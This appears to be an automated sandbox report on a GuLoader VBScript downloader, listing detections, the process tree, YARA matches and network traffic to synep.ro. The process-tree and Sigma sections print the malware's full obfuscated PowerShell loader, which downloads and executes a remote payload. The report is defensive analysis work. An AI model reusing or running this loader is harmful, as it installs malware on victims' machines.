
Windows Analysis Report
O1CZjzItH1.vbs

Overview

General Information

Sample name: O1CZjzItH1.vbs (renamed because the original name is a hash value)
Original sample name: adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959.vbs
Analysis ID: 1540050
MD5: 250e1218609ed0d1e84e24290a5c3759
SHA1: cb11233eb647f9731ae643d959fa3f40a483f3aa
SHA256: adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959
Tags: D3Lab, SnakeKeyLogger, SPAM-ITA, vbs, user-JAMESWT_MHT

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 1248 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 4324 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. 
llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe 
aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3228 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. 
llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe 
aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Blogpost URLs: (none)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source | Rule | Description | Author | Strings
  • 00000006.00000002.3353773662.00000000084D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
  • 00000006.00000002.3353948398.000000000C936000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
  • 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
  • 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_GuLoader_5 | Yara detected GuLoader | Joe Security
  • Process Memory Space: powershell.exe PID: 3136 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Source | Rule | Description | Author | Strings
  • amsi64_3136.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
  • amsi32_3228.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
    • 0xc567:$b2: ::FromBase64String(
    • 0xb5ce:$s1: -join
    • 0x4d7a:$s4: +=
    • 0x4e3c:$s4: +=
    • 0x9063:$s4: +=
    • 0xb180:$s4: +=
    • 0xb46a:$s4: +=
    • 0xb5b0:$s4: +=
    • 0x154af:$s4: +=
    • 0x1552f:$s4: +=
    • 0x155f5:$s4: +=
    • 0x15675:$s4: +=
    • 0x1584b:$s4: +=
    • 0x158cf:$s4: +=
    • 0xbe03:$e4: Get-WmiObject
    • 0xbff2:$e4: Get-Process
    • 0xc04a:$e4: Start-Process
    • 0x1613f:$e4: Get-Process

              System Summary

Source: Process started, Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", ProcessId: 1248, ProcessName: wscript.exe
Source: Process started, Author: Michael Haag, Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", ProcessId: 1248, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. 
PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbe
              No Suricata rule has matched

              AV Detection

Source: O1CZjzItH1.vbs, ReversingLabs: Detection: 28%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 98.5% probability
Source: unknown, HTTPS traffic detected: 31.14.12.249:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: Binary string: aqm.Core.pdbZ source: powershell.exe, 00000006.00000002.3346493152.0000000007103000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3346493152.0000000007030000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe, Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic, HTTP traffic detected: GET /Lysbad.psp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: synep.ro | Connection: Keep-Alive
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected: GET /Lysbad.psp HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: synep.ro | Connection: Keep-Alive
Source: global traffic, DNS traffic detected: DNS query: gormezl_6777.6777.6777.677e
Source: global traffic, DNS traffic detected: DNS query: synep.ro
Source: powershell.exe, 00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://nuget.org/NuGet.exe
